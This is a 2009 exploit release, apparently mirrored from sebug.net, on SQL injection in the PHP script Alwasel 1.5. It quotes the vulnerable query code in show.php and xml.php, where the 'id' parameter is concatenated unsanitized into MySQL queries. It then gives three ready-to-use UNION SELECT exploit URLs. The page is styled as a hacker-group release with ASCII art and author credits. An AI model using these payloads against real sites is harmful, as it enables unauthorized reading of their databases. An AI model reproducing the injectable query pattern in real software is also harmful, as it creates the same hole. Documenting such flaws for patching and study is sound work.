Alwasel 1.5 Multiple Remote SQL Injection Vulnerabilities

🗓️ 07 Aug 2009 00:00:00Reported by RootType
Alwasel 1.5 Multiple Remote SQL Injection Vulnerabilities identified in show.php and xml.php scripts leading to unauthorized data acces

                                                ------------------Alwasel v1.5 Multiple Remote Vulnerabilities----------------------------
   #     ####     #     ###      ##   ###  ####  ####  ###   ## ###   ####  ####   ###     #    ### ####  ######
   ##     #  #    ##     # #    # #  #  #   # #   #  #  #    #   #   #    #  # #  #  #     ##    #   # # #  #  #
   # #    #  #    # #    # #    # #  #      #     #  #   #   #   #  #        #    #        # #   #   #      #  
  #  #    ###    #  #    ###   #  #   ##    ###   ###    #  #    #  #        ###   ##      #  #  #   ###    #  
  ####    #  #   ####    #  # ######    #   #     #  #    # #    #  #        #       #     #   # #   #      #  
 #   #    #   # #   #    #  #     # #   #   #     #   #   ##     #   #    #  #   #   #     #    ##   #      #  
##    ## ###   ##    ## ####     ### ###   ####  ###   #   #    ###   ####  ####  ###   # ###    #  ####   ### 


#----------------------------------------------------------------------------------------------------------------
Script : Alwasel
version : 1.5
Language: PHP
Site: http://www.abushhab.com
Demo :http://alwasel.abushhab.com/1/
Info :http://abushhab.com/alwasel.html
Author: SwEET-DeViL
#----------------------------------------------------------------------------------------------------------------

)=&gt; show.php
.................................................................................................................
if ( $_GET['id'] )
 {
 $qshowcinfo = @mysql_query( &quot;SELECT * FROM cat where id = &quot;.$_GET['id'] );  &lt;==============={
 $nshowcinfo = @mysql_num_rows( $qshowcinfo );
//###################################################################################################
if ( $_GET['id'] )
    {
 $qshowsinfo = @mysql_query( &quot;SELECT * FROM site where id = &quot;.$_GET['id'].&quot; and ok != 0 and ok != 2&quot; );  &lt;==============={
 $nshowsinfo = @mysql_num_rows( $qshowsinfo );

.................................................................................................................
#Exploit:

http://WWW.Site.Com/alwasel/show.php?page=cat&amp;id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--

http://WWW.Site.Com/alwasel/show.php?page=site&amp;id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16#--

-----------------------------------------------------------------------------------------------------------------

)=&gt; xml.php
.................................................................................................................
if ( $_GET['id'] )
 {
 $qshowcinfo = @mysql_query( &quot;SELECT * FROM cat where id = &quot;.$_GET['id'] );  &lt;==============={
 $nshowcinfo = @mysql_num_rows( $qshowcinfo );

.................................................................................................................
#Exploit:

http://WWW.Site.Com/alwasel/xml.php?page=cat&amp;id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13#--


-----------------------------------------------------------------------------------------------------------------

#......&gt;


/-------------www.arab4services.net-----------------\
|+------------------------------------------------+ |
||          SwEET-DeViL &amp; viP HaCkEr              | |
||            gamr-14(at)hotmail.com              | |
|+------------------------------------------------+ |
\---------------------------------------------------/

# sebug.net
07 Aug 2009 00:00Current
7.1High risk
Vulners AI Score7.1